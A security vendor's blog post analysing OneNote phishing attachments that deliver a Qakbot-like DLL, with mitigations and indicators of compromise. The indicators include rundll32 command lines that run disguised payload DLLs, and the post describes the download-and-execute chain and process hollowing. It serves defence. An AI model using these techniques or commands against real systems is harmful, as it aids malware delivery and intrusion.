In the past month, Blackpoint Cyber’s SOC caught and eliminated over a dozen instances of malicious OneNote files (.one) being used as an attempt to gain initial access. Attacks from various threat actors have been observed using similar techniques. Microsoft macros, which add additional features and functions to Microsoft Office products, have been used as an initial access vector for attackers for quite some time. To mitigate this attack surface, Microsoft rolled out a feature change in April 2022 that blocks macros by default on Office files downloaded from the internet. When a major initial access vector is blocked, adversaries must adapt their tactics, techniques, and procedures (TTPs) to remain active.
Like many initial access vectors, the OneNote attack comes as an attachment within a phishing email, requiring the victim to open the file and click the payload for execution. The payloads observed by Blackpoint Cyber’s Adversary Pursuit Group (APG) contained scripts to download and execute additional payloads from the adversary’s server. Using this technique allows adversaries the ability to launch various attack types and change payloads at their leisure.
Technical Analysis
The APG analyzed many of the recent OneNote attacks to identify trends and use cases of the adversaries.
Figure 1 is an example of what a malicious .one file displays upon opening with Microsoft OneNote. By default, the application opens the file in Read-Only mode and explains to the victim that the additional attachments are in the cloud.
Figure 1. Example of a malicious OneNote file
Enabling edit mode on the file reveals that the “Open” button is just a text box which overlays an embedded file named “Open.cmd” (Figure 2).
Figure 2: Displaying the hidden attachment
Designed as a convenient addition to taking notes, OneNote allows files to be embedded as attachments. Multiple file types can be embedded and executed from OneNote including documents, videos, audio clips, batch scripts, HTA (HTML Application), JS (JavaScript), WSF (Windows Script File), and VBS (Visual Basic script). What was intended for convenience and ease of use has quickly turned into an attack vector by threat actors.
Figure 3 is an example of a deobfuscated batch script found embedded in one of the samples analyzed by the APG. This script downloads 01.gif, saves it as putty.jpg, and executes it with rundll32.exe. The APG also observed different hash signatures for every download of putty.jpg which implies the threat actor is using automation in their payload generation.
Figure 3: Deobfuscated batch script
The putty.jpg file was a Dynamic Link Library (DLL) masquerading as an image file to evade detection. Upon execution, rundll32.exe loaded putty.jpg as module and created the following processes before killing its own process:
wermgr.exe (Windows Problem Reporting)
rundll32.exe injected shellcode into wermgr.exe using process hollowing
This technique hides malicious code inside a legitimate process
msra.exe (Microsoft Remote Assistant)
Sets multiple registry keys under “HKCU\Software\Microsoft\Yerqbqokc\”
Creates SearchProtocolHost.exe thread (an index of your filesystem)
Queries values from multiple registry keys listed above
svchost.exe (Service Host)
Sets multiple registry keys under “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tasks\”
Modifies Windows Update Orchestrator
Most of the malware samples collected from the OneNote attacks collected by Blackpoint’s SOC were identified to be possible Qakbot attacks due to IoCs (Indicators of Compromise) matching known Qakbot attacks. This was determined by antivirus detection, YARA rules, and the APG. Qakbot is known for process injection into legitimate processes and the use of “Wind” as an exported function in their DLLs.
Conclusion
The execution of embedded OneNote payloads can have varying outcomes based on the adversary’s intent. The APG’s analysis revealed that this particular attack aimed to:
establish persistence in the registry and scheduled tasks and
set up for further payload delivery and C2 interactions.
However, other threat actors could leverage OneNote as a means to deliver ransomware or carry out more complex attacks. Currently, it seems that manual user interaction in the form of double-clicking one of the embedded files is required to initiate the attack, as OneNote does not possess built-in automatic execution. It is important to remain vigilant and cautious when handling unsolicited or suspicious OneNote files to prevent falling victim to this type of attack.
After observing this tactic for user execution, the SOC deployed a rule to improve detection on these attacks. Between Feb. 1-16, 2023, the rule has been triggered 39 times on 13 devices, as users typically execute multiple times. The SOC and APG will continue to monitor for, and defend against, the malicious use of OneNote.
Mitigation
Block all .one attachments in emails.
If the use of a OneNote attachment is required, validate the source and credibility before opening.
Neo23x0 released a Yara rule for detecting suspicious embedded file types in OneNote files.
Other files seen were not collected due to AV destruction.
Initial payload OneNote files:
AgreementCancelation_367226(Feb08).one
Cancellation.one
document.one
DocumentsFolder_780693(Feb03).one
Cancelation.one
cancelation.one
Secured-Document.one
ComplaintCopy_75601(Feb01).one
Embedded OneNote attachments:
Open.cmd (Batch Script)
as2ECOj.cmd (Batch Script)
Open.hta (HTML Application Script)
document.hta (HTML Application Script)
Final payload files:
aYmyWrBC.jpg
DLL executed with “rundll32.exe C:\programdata\aYmyWrBC.jpg,Wind”
atzTG39.png
DLL executed with “rundll32.exe C:\ProgramData\atzTG39.png,Wind”
aCfzEaqD.png
Deleted prior to execution
index1.png
DLL executed with “rundll32.exe C:\ProgramData\index1.png,Wind”
IPs:
Domains:
DATE PUBLISHEDFebruary 20, 2023
AUTHORBlackpoint Cyber
SHARE ON
Subscribe to the Blackpoint Blog
Don’t let a lack of awareness leave the organizations you protect vulnerable to sophisticated and elusive attacks. Subscribe now for a weekly roundup of Blackpoint’s empowering articles.
